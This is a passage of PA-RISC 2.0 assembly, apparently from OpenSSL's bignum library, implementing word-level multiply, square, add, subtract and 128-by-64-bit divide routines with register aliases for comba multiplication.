	; Top of loop aligned on 64-byte boundary
	;
bn_mul_add_words_single_top
	FLDD	0(a_ptr),t_float_0	; load up 64-bit value (fr8L) ht(L)/lt(R)
	LDD	0(r_ptr),rp_val		; rp[0]
	LDO	8(a_ptr),a_ptr		; a_ptr++
	XMPYU	fht_0,fw_l,fm1		; m1 = ht*fw_l
	FSTD	fm1,-16(%sp)		; -16(sp) = m1
	XMPYU	flt_0,fw_h,fm		; m = lt*fw_h
	FSTD	fm,-8(%sp)		; -8(sp) = m
	XMPYU	fht_0,fw_h,ht_temp	; ht_temp = ht*fw_h
	FSTD	ht_temp,-24(%sp)	; -24(sp) = ht
	XMPYU	flt_0,fw_l,lt_temp	; lt_temp = lt*fw_l
	FSTD	lt_temp,-32(%sp)	; -32(sp) = lt
	LDD	-8(%sp),m_0
	LDD	-16(%sp),m1_0		; m1 = temp1
	ADD,L	m_0,m1_0,tmp_0		; tmp_0 = m + m1;
	LDD	-24(%sp),ht_0
	LDD	-32(%sp),lt_0
	CMPCLR,*>>=	tmp_0,m1_0,%r0	; if (m < m1)
	ADD,L	ht_0,top_overflow,ht_0	; ht += (1<<32)
	EXTRD,U	tmp_0,31,32,m_0		; m>>32
	DEPD,Z	tmp_0,31,32,m1_0	; m1 = m<<32
	ADD,L	ht_0,m_0,ht_0		; ht+= (m>>32)
	ADD	lt_0,m1_0,tmp_0		; tmp_0 = lt+m1;
	ADD,DC	ht_0,%r0,ht_0		; ht++
	ADD	%ret0,tmp_0,lt_0	; lt = lt + c;
	ADD,DC	ht_0,%r0,ht_0		; ht++
	ADD	lt_0,rp_val,lt_0	; lt = lt+rp[0]
	ADD,DC	ht_0,%r0,%ret0		; ht++; final carry -> return value
	STD	lt_0,0(r_ptr)		; rp[0] = lt
bn_mul_add_words_exit
	.EXIT
	LDD	-80(%sp),%r9		; restore r9
	LDD	-88(%sp),%r8		; restore r8
	LDD	-96(%sp),%r7		; restore r7
	LDD	-104(%sp),%r6		; restore r6
	LDD	-112(%sp),%r5		; restore r5
	LDD	-120(%sp),%r4		; restore r4
	BVE	(%rp)
	LDD,MB	-128(%sp),%r3		; restore r3 and pop frame (delay slot)
	.PROCEND	;in=23,24,25,26,29;out=28;
;----------------------------------------------------------------------------
;
;BN_ULONG bn_mul_words(BN_ULONG *rp, BN_ULONG *ap, int num, BN_ULONG w)
;
; Computes rp[i] = ap[i] * w for i in [0, num) (no accumulate, unlike
; bn_mul_add_words) and returns the final 64-bit carry in %ret0.
; Same four-XMPYU partial-product scheme; main loop unrolled twice.
;
; arg0 = rp
; arg1 = ap
; arg2 = num
; arg3 = w
bn_mul_words
	.proc
	.callinfo frame=128
	.entry
	.EXPORT	bn_mul_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
	.align 64
	STD	%r3,0(%sp)		; save r3
	STD	%r4,8(%sp)		; save r4
	STD	%r5,16(%sp)		; save r5
	STD	%r6,24(%sp)		; save r6
	STD	%r7,32(%sp)		; save r7
	COPY	%r0,%ret0		; return 0 by default
	DEPDI,Z	1,31,1,top_overflow	; top_overflow = 1 << 32
	STD	w,56(%sp)		; w on stack (reloaded as -72 after bump)
	CMPIB,>=	0,num,bn_mul_words_exit
	LDO	128(%sp),%sp		; bump stack
	;
	; See if only 1 word to do, thus just do cleanup
	;
	CMPIB,=	1,num,bn_mul_words_single_top
	FLDD	-72(%sp),fw	; load up w into fp register fw (fw_h/fw_l)
	;
	; This loop is unrolled 2 times (64-byte aligned as well)
	;
	; PA-RISC 2.0 chips have two fully pipelined multipliers, thus
	; two 32-bit mutiplies can be issued per cycle.
	;
bn_mul_words_unroll2
	FLDD	0(a_ptr),t_float_0	; load up 64-bit value (fr8L) ht(L)/lt(R)
	FLDD	8(a_ptr),t_float_1	; load up 64-bit value (fr8L) ht(L)/lt(R)
	XMPYU	fht_0,fw_l,fm1		; m1[0] = fht_0*fw_l
	XMPYU	fht_1,fw_l,fm1_1	; m1[1] = ht*fw_l
	FSTD	fm1,-16(%sp)		; -16(sp) = m1
	FSTD	fm1_1,-48(%sp)		; -48(sp) = m1
	XMPYU	flt_0,fw_h,fm		; m = lt*fw_h
	XMPYU	flt_1,fw_h,fm_1		; m = lt*fw_h
	FSTD	fm,-8(%sp)		; -8(sp) = m
	FSTD	fm_1,-40(%sp)		; -40(sp) = m
	XMPYU	fht_0,fw_h,ht_temp	; ht_temp = fht_0*fw_h
	XMPYU	fht_1,fw_h,ht_temp_1	; ht_temp = ht*fw_h
	FSTD	ht_temp,-24(%sp)	; -24(sp) = ht
	FSTD	ht_temp_1,-56(%sp)	; -56(sp) = ht
	XMPYU	flt_0,fw_l,lt_temp	; lt_temp = lt*fw_l
	XMPYU	flt_1,fw_l,lt_temp_1	; lt_temp = lt*fw_l
	FSTD	lt_temp,-32(%sp)	; -32(sp) = lt
	FSTD	lt_temp_1,-64(%sp)	; -64(sp) = lt
	LDD	-8(%sp),m_0
	LDD	-40(%sp),m_1
	LDD	-16(%sp),m1_0
	LDD	-48(%sp),m1_1
	LDD	-24(%sp),ht_0
	LDD	-56(%sp),ht_1
	ADD,L	m1_0,m_0,tmp_0		; tmp_0 = m + m1;
	ADD,L	m1_1,m_1,tmp_1		; tmp_1 = m + m1;
	LDD	-32(%sp),lt_0
	LDD	-64(%sp),lt_1
	CMPCLR,*>>=	tmp_0,m1_0, %r0	; if (m < m1)
	ADD,L	ht_0,top_overflow,ht_0	; ht += (1<<32)
	CMPCLR,*>>=	tmp_1,m1_1,%r0	; if (m < m1)
	ADD,L	ht_1,top_overflow,ht_1	; ht += (1<<32)
	EXTRD,U	tmp_0,31,32,m_0		; m>>32
	DEPD,Z	tmp_0,31,32,m1_0	; m1 = m<<32
	EXTRD,U	tmp_1,31,32,m_1		; m>>32
	DEPD,Z	tmp_1,31,32,m1_1	; m1 = m<<32
	ADD,L	ht_0,m_0,ht_0		; ht+= (m>>32)
	ADD,L	ht_1,m_1,ht_1		; ht+= (m>>32)
	ADD	lt_0,m1_0,lt_0		; lt = lt+m1;
	ADD,DC	ht_0,%r0,ht_0		; ht++
	ADD	lt_1,m1_1,lt_1		; lt = lt+m1;
	ADD,DC	ht_1,%r0,ht_1		; ht++
	ADD	%ret0,lt_0,lt_0		; lt = lt + c (ret0);
	ADD,DC	ht_0,%r0,ht_0		; ht++
	ADD	ht_0,lt_1,lt_1		; lt = lt + c (ht_0)
	ADD,DC	ht_1,%r0,ht_1		; ht++
	STD	lt_0,0(r_ptr)		; rp[0] = lt
	STD	lt_1,8(r_ptr)		; rp[1] = lt
	COPY	ht_1,%ret0		; carry = ht
	LDO	-2(num),num		; num = num - 2;
	LDO	16(a_ptr),a_ptr		; ap += 2
	CMPIB,<=	2,num,bn_mul_words_unroll2
	LDO	16(r_ptr),r_ptr		; rp += 2 (delay slot)
	CMPIB,=,N	0,num,bn_mul_words_exit	; are we done?
	;
	; Top of loop aligned on 64-byte boundary
	;
bn_mul_words_single_top
	FLDD	0(a_ptr),t_float_0	; load up 64-bit value (fr8L) ht(L)/lt(R)
	XMPYU	fht_0,fw_l,fm1		; m1 = ht*fw_l
	FSTD	fm1,-16(%sp)		; -16(sp) = m1
	XMPYU	flt_0,fw_h,fm		; m = lt*fw_h
	FSTD	fm,-8(%sp)		; -8(sp) = m
	XMPYU	fht_0,fw_h,ht_temp	; ht_temp = ht*fw_h
	FSTD	ht_temp,-24(%sp)	; -24(sp) = ht
	XMPYU	flt_0,fw_l,lt_temp	; lt_temp = lt*fw_l
	FSTD	lt_temp,-32(%sp)	; -32(sp) = lt
	LDD	-8(%sp),m_0
	LDD	-16(%sp),m1_0
	ADD,L	m_0,m1_0,tmp_0		; tmp_0 = m + m1;
	LDD	-24(%sp),ht_0
	LDD	-32(%sp),lt_0
	CMPCLR,*>>=	tmp_0,m1_0,%r0	; if (m < m1)
	ADD,L	ht_0,top_overflow,ht_0	; ht += (1<<32)
	EXTRD,U	tmp_0,31,32,m_0		; m>>32
	DEPD,Z	tmp_0,31,32,m1_0	; m1 = m<<32
	ADD,L	ht_0,m_0,ht_0		; ht+= (m>>32)
	ADD	lt_0,m1_0,lt_0		; lt= lt+m1;
	ADD,DC	ht_0,%r0,ht_0		; ht++
	ADD	%ret0,lt_0,lt_0		; lt = lt + c;
	ADD,DC	ht_0,%r0,ht_0		; ht++
	COPY	ht_0,%ret0		; copy carry
	STD	lt_0,0(r_ptr)		; rp[0] = lt
bn_mul_words_exit
	.EXIT
	LDD	-96(%sp),%r7		; restore r7
	LDD	-104(%sp),%r6		; restore r6
	LDD	-112(%sp),%r5		; restore r5
	LDD	-120(%sp),%r4		; restore r4
	BVE	(%rp)
	LDD,MB	-128(%sp),%r3		; restore r3 and pop frame (delay slot)
	.PROCEND	;in=23,24,25,26,29;out=28;
;----------------------------------------------------------------------------
;
;void bn_sqr_words(BN_ULONG *rp, BN_ULONG *ap, int num)
;
; Squares each input word: rp[2*i] = LO64(ap[i]^2), rp[2*i+1] = HI64(ap[i]^2)
; for i in [0, num).  Output array is 2*num words.  No return value.
;
; A 64-bit square needs only three 32x32 products (the two cross products
; are equal): a^2 = ht^2<<64 + 2*ht*lt<<32 + lt^2.  The doubled middle
; product "m" is handled via high_mask/shift below.  Loop unrolled twice.
;
; arg0 = rp
; arg1 = ap
; arg2 = num
;
bn_sqr_words
	.proc
	.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
	.EXPORT	bn_sqr_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
	.entry
	.align 64
	STD	%r3,0(%sp)		; save r3
	STD	%r4,8(%sp)		; save r4
	NOP
	STD	%r5,16(%sp)		; save r5
	CMPIB,>=	0,num,bn_sqr_words_exit
	LDO	128(%sp),%sp		; bump stack
	;
	; If only 1, the goto straight to cleanup
	;
	CMPIB,=	1,num,bn_sqr_words_single_top
	DEPDI,Z	-1,32,33,high_mask	; Create Mask 0xffffffff80000000L
	;
	; This loop is unrolled 2 times (64-byte aligned as well)
	;
bn_sqr_words_unroll2
	FLDD	0(a_ptr),t_float_0	; a[0]
	FLDD	8(a_ptr),t_float_1	; a[1]
	XMPYU	fht_0,flt_0,fm		; m[0] = ht*lt (cross product, added twice)
	XMPYU	fht_1,flt_1,fm_1	; m[1]
	FSTD	fm,-24(%sp)		; store m[0]
	FSTD	fm_1,-56(%sp)		; store m[1]
	XMPYU	flt_0,flt_0,lt_temp	; lt[0] = lt^2
	XMPYU	flt_1,flt_1,lt_temp_1	; lt[1]
	FSTD	lt_temp,-16(%sp)	; store lt[0]
	FSTD	lt_temp_1,-48(%sp)	; store lt[1]
	XMPYU	fht_0,fht_0,ht_temp	; ht[0] = ht^2
	XMPYU	fht_1,fht_1,ht_temp_1	; ht[1]
	FSTD	ht_temp,-8(%sp)		; store ht[0]
	FSTD	ht_temp_1,-40(%sp)	; store ht[1]
	LDD	-24(%sp),m_0
	LDD	-56(%sp),m_1
	AND	m_0,high_mask,tmp_0	; m[0] & Mask
	AND	m_1,high_mask,tmp_1	; m[1] & Mask
	DEPD,Z	m_0,30,31,m_0		; m[0] << 32+1 (low half of 2*m)
	DEPD,Z	m_1,30,31,m_1		; m[1] << 32+1
	LDD	-16(%sp),lt_0
	LDD	-48(%sp),lt_1
	EXTRD,U	tmp_0,32,33,tmp_0	; tmp_0 = m[0]&Mask >> 32-1 (high half of 2*m)
	EXTRD,U	tmp_1,32,33,tmp_1	; tmp_1 = m[1]&Mask >> 32-1
	LDD	-8(%sp),ht_0
	LDD	-40(%sp),ht_1
	ADD,L	ht_0,tmp_0,ht_0		; ht[0] += tmp_0
	ADD,L	ht_1,tmp_1,ht_1		; ht[1] += tmp_1
	ADD	lt_0,m_0,lt_0		; lt = lt+m
	ADD,DC	ht_0,%r0,ht_0		; ht[0]++
	STD	lt_0,0(r_ptr)		; rp[0] = lt[0]
	STD	ht_0,8(r_ptr)		; rp[1] = ht[0]
	ADD	lt_1,m_1,lt_1		; lt = lt+m
	ADD,DC	ht_1,%r0,ht_1		; ht[1]++
	STD	lt_1,16(r_ptr)		; rp[2] = lt[1]
	STD	ht_1,24(r_ptr)		; rp[3] = ht[1]
	LDO	-2(num),num		; num = num - 2;
	LDO	16(a_ptr),a_ptr		; ap += 2
	CMPIB,<=	2,num,bn_sqr_words_unroll2
	LDO	32(r_ptr),r_ptr		; rp += 4 (delay slot)
	CMPIB,=,N	0,num,bn_sqr_words_exit	; are we done?
	;
	; Top of loop aligned on 64-byte boundary
	;
bn_sqr_words_single_top
	FLDD	0(a_ptr),t_float_0	; load up 64-bit value (fr8L) ht(L)/lt(R)
	XMPYU	fht_0,flt_0,fm		; m
	FSTD	fm,-24(%sp)		; store m
	XMPYU	flt_0,flt_0,lt_temp	; lt
	FSTD	lt_temp,-16(%sp)	; store lt
	XMPYU	fht_0,fht_0,ht_temp	; ht
	FSTD	ht_temp,-8(%sp)		; store ht
	LDD	-24(%sp),m_0		; load m
	AND	m_0,high_mask,tmp_0	; m & Mask
	DEPD,Z	m_0,30,31,m_0		; m << 32+1
	LDD	-16(%sp),lt_0		; lt
	LDD	-8(%sp),ht_0		; ht
	EXTRD,U	tmp_0,32,33,tmp_0	; tmp_0 = m&Mask >> 32-1
	ADD	m_0,lt_0,lt_0		; lt = lt+m
	ADD,L	ht_0,tmp_0,ht_0		; ht += tmp_0
	ADD,DC	ht_0,%r0,ht_0		; ht++
	STD	lt_0,0(r_ptr)		; rp[0] = lt
	STD	ht_0,8(r_ptr)		; rp[1] = ht
bn_sqr_words_exit
	.EXIT
	LDD	-112(%sp),%r5		; restore r5
	LDD	-120(%sp),%r4		; restore r4
	BVE	(%rp)
	LDD,MB	-128(%sp),%r3		; restore r3 and pop frame (delay slot)
	.PROCEND	;in=23,24,25,26,29;out=28;
;----------------------------------------------------------------------------
;
;BN_ULONG bn_add_words(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n)
;
; Multi-precision add: r[i] = a[i] + b[i] + carry for i in [0, n);
; returns the final carry (0 or 1) in %ret0.  Returns 0 when n <= 0.
; Leaf routine: no frame, no callee-saved registers touched.
;
; arg0 = rp
; arg1 = ap
; arg2 = bp
; arg3 = n
t	.reg %r22		; a[i]
b	.reg %r21		; b[i]
l	.reg %r20		; result word
bn_add_words
	.proc
	.entry
	.callinfo
	.EXPORT	bn_add_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
	.align 64
	CMPIB,>=	0,n,bn_add_words_exit
	COPY	%r0,%ret0		; return 0 by default
	;
	; If 2 or more numbers do the loop
	;
	CMPIB,=	1,n,bn_add_words_single_top
	NOP
	;
	; This loop is unrolled 2 times (64-byte aligned as well)
	;
	; Carry handling: ADD,DC %r0,%r0,%ret0 captures the carry bit of the
	; preceding ADD; the two partial adds (t+c, then +b) can each carry,
	; and the two captured carries are accumulated into %ret0.
	;
bn_add_words_unroll2
	LDD	0(a_ptr),t
	LDD	0(b_ptr),b
	ADD	t,%ret0,t		; t = t+c;
	ADD,DC	%r0,%r0,%ret0		; set c to carry
	ADD	t,b,l			; l = t + b[0]
	ADD,DC	%ret0,%r0,%ret0		; c+= carry
	STD	l,0(r_ptr)
	LDD	8(a_ptr),t
	LDD	8(b_ptr),b
	ADD	t,%ret0,t		; t = t+c;
	ADD,DC	%r0,%r0,%ret0		; set c to carry
	ADD	t,b,l			; l = t + b[0]
	ADD,DC	%ret0,%r0,%ret0		; c+= carry
	STD	l,8(r_ptr)
	LDO	-2(n),n
	LDO	16(a_ptr),a_ptr
	LDO	16(b_ptr),b_ptr
	CMPIB,<=	2,n,bn_add_words_unroll2
	LDO	16(r_ptr),r_ptr		; delay slot
	CMPIB,=,N	0,n,bn_add_words_exit	; are we done?
bn_add_words_single_top
	LDD	0(a_ptr),t
	LDD	0(b_ptr),b
	ADD	t,%ret0,t		; t = t+c;
	ADD,DC	%r0,%r0,%ret0		; set c to carry (could use CMPCLR??)
	ADD	t,b,l			; l = t + b[0]
	ADD,DC	%ret0,%r0,%ret0		; c+= carry
	STD	l,0(r_ptr)
bn_add_words_exit
	.EXIT
	BVE	(%rp)
	NOP
	.PROCEND	;in=23,24,25,26,29;out=28;
;----------------------------------------------------------------------------
;
;BN_ULONG bn_sub_words(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n)
;
; Multi-precision subtract: r[i] = a[i] - b[i] - borrow for i in [0, n);
; returns the final borrow (0 or 1) in %ret0.  Returns 0 when n <= 0.
; Leaf routine: no frame, no callee-saved registers touched.
;
; Borrow idiom per word (CMPCLR nullifies the NEXT instruction and zeroes
; its target when the condition holds):
;   sub_tmp2 = (t1 > t2) ? 0 : 1    ; candidate new borrow
;   if (t1 != t2) ret0 = sub_tmp2   ; on equality keep the incoming borrow
;
; arg0 = rp
; arg1 = ap
; arg2 = bp
; arg3 = n
t1	.reg %r22		; a[i]
t2	.reg %r21		; b[i]
sub_tmp1	.reg %r20	; result word
sub_tmp2	.reg %r19	; candidate borrow
bn_sub_words
	.proc
	.callinfo
	.EXPORT	bn_sub_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
	.entry
	.align 64
	CMPIB,>=	0,n,bn_sub_words_exit
	COPY	%r0,%ret0		; return 0 by default
	;
	; If 2 or more numbers do the loop
	;
	CMPIB,=	1,n,bn_sub_words_single_top
	NOP
	;
	; This loop is unrolled 2 times (64-byte aligned as well)
	;
bn_sub_words_unroll2
	LDD	0(a_ptr),t1
	LDD	0(b_ptr),t2
	SUB	t1,t2,sub_tmp1		; t3 = t1-t2;
	SUB	sub_tmp1,%ret0,sub_tmp1	; t3 = t3- c;
	CMPCLR,*>>	t1,t2,sub_tmp2	; clear if t1 > t2 (and nullify next)
	LDO	1(%r0),sub_tmp2		; else borrow candidate = 1
	CMPCLR,*=	t1,t2,%r0	; if t1 == t2 keep incoming borrow
	COPY	sub_tmp2,%ret0
	STD	sub_tmp1,0(r_ptr)
	LDD	8(a_ptr),t1
	LDD	8(b_ptr),t2
	SUB	t1,t2,sub_tmp1		; t3 = t1-t2;
	SUB	sub_tmp1,%ret0,sub_tmp1	; t3 = t3- c;
	CMPCLR,*>>	t1,t2,sub_tmp2	; clear if t1 > t2
	LDO	1(%r0),sub_tmp2
	CMPCLR,*=	t1,t2,%r0
	COPY	sub_tmp2,%ret0
	STD	sub_tmp1,8(r_ptr)
	LDO	-2(n),n
	LDO	16(a_ptr),a_ptr
	LDO	16(b_ptr),b_ptr
	CMPIB,<=	2,n,bn_sub_words_unroll2
	LDO	16(r_ptr),r_ptr		; delay slot
	CMPIB,=,N	0,n,bn_sub_words_exit	; are we done?
bn_sub_words_single_top
	LDD	0(a_ptr),t1
	LDD	0(b_ptr),t2
	SUB	t1,t2,sub_tmp1		; t3 = t1-t2;
	SUB	sub_tmp1,%ret0,sub_tmp1	; t3 = t3- c;
	CMPCLR,*>>	t1,t2,sub_tmp2	; clear if t1 > t2
	LDO	1(%r0),sub_tmp2
	CMPCLR,*=	t1,t2,%r0
	COPY	sub_tmp2,%ret0
	STD	sub_tmp1,0(r_ptr)
bn_sub_words_exit
	.EXIT
	BVE	(%rp)
	NOP
	.PROCEND	;in=23,24,25,26,29;out=28;
;------------------------------------------------------------------------------
;
; unsigned long bn_div_words(unsigned long h, unsigned long l, unsigned long d)
;
; Computes the 64-bit quotient of the 128-bit value h:l divided by d.
; Returns -1 when d == 0; aborts via fprintf/abort when h >= (1 << bits(d))
; would overflow the quotient (bn_div_err_case).
;
; Algorithm: normalize d (shift left so its top bit is set, shifting h:l
; by the same amount), then produce the quotient 32 bits at a time over
; two iterations (count in %r9), estimating each 32-bit digit with the
; $$div2U millicode divide and correcting the estimate in the
; $00000024/$0000002A loop.
;
; arg0 = h
; arg1 = l
; arg2 = d
;
; This is mainly just modified assembly from the compiler, thus the
; lack of variable names.
;
;------------------------------------------------------------------------------
bn_div_words
	.proc
	.callinfo CALLER,FRAME=272,ENTRY_GR=%r10,SAVE_RP,ARGS_SAVED,ORDERING_AWARE
	.EXPORT	bn_div_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
	.IMPORT	BN_num_bits_word,CODE,NO_RELOCATION
	.IMPORT	__iob,DATA
	.IMPORT	fprintf,CODE,NO_RELOCATION
	.IMPORT	abort,CODE,NO_RELOCATION
	.IMPORT	$$div2U,MILLICODE
	.entry
	STD	%r2,-16(%r30)		; save rp
	STD,MA	%r3,352(%r30)		; save r3, allocate frame
	STD	%r4,-344(%r30)
	STD	%r5,-336(%r30)
	STD	%r6,-328(%r30)
	STD	%r7,-320(%r30)
	STD	%r8,-312(%r30)
	STD	%r9,-304(%r30)
	STD	%r10,-296(%r30)
	STD	%r27,-288(%r30)		; save gp
	COPY	%r24,%r3		; save d
	COPY	%r26,%r4		; save h (high 64-bits)
	LDO	-1(%r0),%ret0		; return -1 by default
	CMPB,*=	%r0,%arg2,$D3		; if (d == 0)
	COPY	%r25,%r5		; save l (low 64-bits)
	LDO	-48(%r30),%r29		; create ap
	.CALL	;in=26,29;out=28;
	B,L	BN_num_bits_word,%r2	; i = BN_num_bits_word(d)
	COPY	%r3,%r26
	LDD	-288(%r30),%r27		; restore gp
	LDI	64,%r21
	CMPB,=	%r21,%ret0,$00000012	;if (i == 64) (forward)
	COPY	%ret0,%r24		; i
	MTSARCM	%r24
	DEPDI,Z	-1,%sar,1,%r29
	CMPB,*<<,N	%r29,%r4,bn_div_err_case ; if (h > 1<<i) (forward)
$00000012
	SUBI	64,%r24,%r31		; i = 64 - i;
	CMPCLR,*<<	%r4,%r3,%r0	; if (h >= d)
	SUB	%r4,%r3,%r4		; h -= d
	CMPB,=	%r31,%r0,$0000001A	; if (i) -- skip normalization when i == 0
	COPY	%r0,%r10		; ret = 0
	MTSARCM	%r31			; i to shift
	DEPD,Z	%r3,%sar,64,%r3		; d <<= i;
	SUBI	64,%r31,%r19		; 64 - i; redundant
	MTSAR	%r19			; (64 -i) to shift
	SHRPD	%r4,%r5,%sar,%r4	; l>> (64-i)
	MTSARCM	%r31			; i to shift
	DEPD,Z	%r5,%sar,64,%r5		; l <<= i;
$0000001A
	DEPDI,Z	-1,31,32,%r19		; %r19 = 0xffffffff00000000
	EXTRD,U	%r3,31,32,%r6		; dh = d >> 32
	EXTRD,U	%r3,63,32,%r8		; dl = d & 0xffffffff
	LDO	2(%r0),%r9		; count = 2 (two 32-bit quotient digits)
	STD	%r3,-280(%r30)		; "d" to stack
$0000001C
	DEPDI,Z	-1,63,32,%r29		; q estimate = 0xffffffff
	EXTRD,U	%r4,31,32,%r31		; h >> 32
	CMPB,*=,N	%r31,%r6,$D2	; if ((h>>32) != dh)(forward) div
	COPY	%r4,%r26
	EXTRD,U	%r4,31,32,%r25
	COPY	%r6,%r24
	.CALL	;in=23,24,25,26;out=20,21,22,28,29;	(MILLICALL)
	B,L	$$div2U,%r2		; 64/32 unsigned divide millicode
	EXTRD,U	%r6,31,32,%r23
	DEPD	%r28,31,32,%r29		; q = quotient from millicode
$D2
	STD	%r29,-272(%r30)		; q
	AND	%r5,%r19,%r24		; t & 0xffffffff00000000;
	EXTRD,U	%r24,31,32,%r24		; l >> 32, for the correction loop
	FLDD	-272(%r30),%fr7		; q
	FLDD	-280(%r30),%fr8		; d
	XMPYU	%fr8L,%fr7L,%fr10	; partial products of d*q
	FSTD	%fr10,-256(%r30)
	XMPYU	%fr8L,%fr7R,%fr22
	FSTD	%fr22,-264(%r30)
	XMPYU	%fr8R,%fr7L,%fr11
	XMPYU	%fr8R,%fr7R,%fr23
	FSTD	%fr11,-232(%r30)
	FSTD	%fr23,-240(%r30)
	LDD	-256(%r30),%r28
	DEPD,Z	%r28,31,32,%r2
	LDD	-264(%r30),%r20
	ADD,L	%r20,%r2,%r31
	LDD	-232(%r30),%r22
	DEPD,Z	%r22,31,32,%r22
	LDD	-240(%r30),%r21
	B	$00000024		; enter loop
	ADD,L	%r21,%r22,%r23
$0000002A
	LDO	-1(%r29),%r29		; q--; estimate was one too high
	SUB	%r23,%r8,%r23
$00000024
	SUB	%r4,%r31,%r25
	AND	%r25,%r19,%r26
	CMPB,*<>,N	%r0,%r26,$00000046 ; (forward)
	DEPD,Z	%r25,31,32,%r20
	OR	%r20,%r24,%r21
	CMPB,*<<,N	%r21,%r23,$0000002A ;(backward)
	SUB	%r31,%r6,%r31
	;-------------Break path---------------------
$00000046
	DEPD,Z	%r23,31,32,%r25		;tl
	EXTRD,U	%r23,31,32,%r26		;t
	AND	%r25,%r19,%r24		;tl = (tl<<32)&0xffffffff00000000L
	ADD,L	%r31,%r26,%r31		;th += t;
	CMPCLR,*>>=	%r5,%r24,%r0	;if (l<tl)
	LDO	1(%r31),%r31		; th++;
	CMPB,*<<=,N	%r31,%r4,$00000036 ;if (h < th) (forward)
	LDO	-1(%r29),%r29		;q--;
	ADD,L	%r4,%r3,%r4		;h += d;
$00000036
	ADDIB,=,N	-1,%r9,$D1	;if (--count == 0) break (forward)
	SUB	%r5,%r24,%r28		; l -= tl;
	SUB	%r4,%r31,%r24		; h -= th;
	SHRPD	%r24,%r28,32,%r4	; h = ((h<<32)|(l>>32));
	DEPD,Z	%r29,31,32,%r10		; ret = q<<32
	b	$0000001C		; second (low) quotient digit
	DEPD,Z	%r28,31,32,%r5		; l = l << 32
$D1
	OR	%r10,%r29,%r28		; ret |= q
$D3
	LDD	-368(%r30),%r2		; restore rp
$D0
	LDD	-296(%r30),%r10
	LDD	-304(%r30),%r9
	LDD	-312(%r30),%r8
	LDD	-320(%r30),%r7
	LDD	-328(%r30),%r6
	LDD	-336(%r30),%r5
	LDD	-344(%r30),%r4
	BVE	(%r2)
	.EXIT
	LDD,MB	-352(%r30),%r3		; restore r3 and pop frame (delay slot)
bn_div_err_case
	; Quotient would overflow: print a diagnostic to __iob[1] and abort.
	MFIA	%r6
	ADDIL	L'bn_div_words-bn_div_err_case,%r6,%r1
	LDO	R'bn_div_words-bn_div_err_case(%r1),%r6
	ADDIL	LT'__iob,%r27,%r1
	LDD	RT'__iob(%r1),%r26
	ADDIL	L'C$4-bn_div_words,%r6,%r1
	LDO	R'C$4-bn_div_words(%r1),%r25
	LDO	64(%r26),%r26
	.CALL	;in=24,25,26,29;out=28;
	B,L	fprintf,%r2
	LDO	-48(%r30),%r29
	LDD	-288(%r30),%r27
	.CALL	;in=29;
	B,L	abort,%r2
	LDO	-48(%r30),%r29
	LDD	-288(%r30),%r27
	B	$D0
	LDD	-368(%r30),%r2
	.PROCEND	;in=24,25,26,29;out=28;
;----------------------------------------------------------------------------
;
; Register aliases for the comba (column-oriented) multiply/square
; routines below.  The "L" part of an FP register corresponds to the
; upper 32-bits, while the "R" part corresponds to the lower 32-bits.
;
; Note, that when using b6 and b7, the code must save these before
; using them because they are callee save registers
;
;
; Floating point registers to use to save values that
; are manipulated. These don't collide with ftemp1-6 and
; are all caller save registers
;
a0	.reg %fr22
a0L	.reg %fr22L
a0R	.reg %fr22R
a1	.reg %fr23
a1L	.reg %fr23L
a1R	.reg %fr23R
a2	.reg %fr24
a2L	.reg %fr24L
a2R	.reg %fr24R
a3	.reg %fr25
a3L	.reg %fr25L
a3R	.reg %fr25R
a4	.reg %fr26
a4L	.reg %fr26L
a4R	.reg %fr26R
a5	.reg %fr27
a5L	.reg %fr27L
a5R	.reg %fr27R
a6	.reg %fr28
a6L	.reg %fr28L
a6R	.reg %fr28R
a7	.reg %fr29
a7L	.reg %fr29L
a7R	.reg %fr29R
b0	.reg %fr30
b0L	.reg %fr30L
b0R	.reg %fr30R
b1	.reg %fr31
b1L	.reg %fr31L
b1R	.reg %fr31R
;
; Temporary floating point variables, these are all caller save
; registers
;
ftemp1	.reg %fr4
ftemp2	.reg %fr5
ftemp3	.reg %fr6
ftemp4	.reg %fr7
;
; The B set of registers when used.
; (b6/b7 live in callee-save fr12/fr13 -- see note above.)
;
b2	.reg %fr8
b2L	.reg %fr8L
b2R	.reg %fr8R
b3	.reg %fr9
b3L	.reg %fr9L
b3R	.reg %fr9R
b4	.reg %fr10
b4L	.reg %fr10L
b4R	.reg %fr10R
b5	.reg %fr11
b5L	.reg %fr11L
b5R	.reg %fr11R
b6	.reg %fr12
b6L	.reg %fr12L
b6R	.reg %fr12R
b7	.reg %fr13
b7L	.reg %fr13L
b7R	.reg %fr13R
;
; Integer registers: c1/c2/c3 are the three rolling column accumulators
; of the comba scheme; the rest are scratch for the macros below.
;
c1	.reg %r21		; only reg
temp1	.reg %r20		; only reg
temp2	.reg %r19		; only reg
temp3	.reg %r31		; only reg
m1	.reg %r28
c2	.reg %r23
high_one	.reg %r1
ht	.reg %r6
lt	.reg %r5
m	.reg %r4
c3	.reg %r3
; SQR_ADD_C: (C3:C2:C1) += a^2 where a is the 64-bit word A0L:A0R.
; Same three-product square trick as bn_sqr_words: the cross product m
; is doubled via the high_mask/shift pair.  Clobbers ftemp1-3, m, lt,
; ht, temp1-3 and -8..-24(%sp).
SQR_ADD_C .macro A0L,A0R,C1,C2,C3
	XMPYU	A0L,A0R,ftemp1		; m
	FSTD	ftemp1,-24(%sp)		; store m
	XMPYU	A0R,A0R,ftemp2		; lt
	FSTD	ftemp2,-16(%sp)		; store lt
	XMPYU	A0L,A0L,ftemp3		; ht
	FSTD	ftemp3,-8(%sp)		; store ht
	LDD	-24(%sp),m		; load m
	AND	m,high_mask,temp2	; m & Mask
	DEPD,Z	m,30,31,temp3		; m << 32+1
	LDD	-16(%sp),lt		; lt
	LDD	-8(%sp),ht		; ht
	EXTRD,U	temp2,32,33,temp1	; temp1 = m&Mask >> 32-1
	ADD	temp3,lt,lt		; lt = lt+m
	ADD,L	ht,temp1,ht		; ht += temp1
	ADD,DC	ht,%r0,ht		; ht++
